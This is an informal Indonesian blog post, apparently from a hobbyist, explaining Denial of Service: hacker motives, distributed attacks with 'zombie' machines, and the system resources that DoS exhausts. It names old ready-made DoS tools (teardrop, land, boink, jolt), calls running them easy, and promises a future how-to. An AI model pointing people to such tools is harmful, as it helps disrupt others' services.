Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial ofService merupakan aktifitas hacker diawal karirnya. Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan seranganDoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ...

Poin terakhir metode penyerangan Denial of Sevice, serangan yang menghabiskan resource. Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space

B. Bandwidth

C. Kernel Tables

D. RAM

E. Disk

F. Caches

G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.

Ok dec menurut Gw penjelasan di atas mengenai DoS dah cukup jelas. Ntar laen kali Gw bakal jelasin bagai mana cara melakukan DoS.. Soalnya sekarang Gw mu main dulu he…he…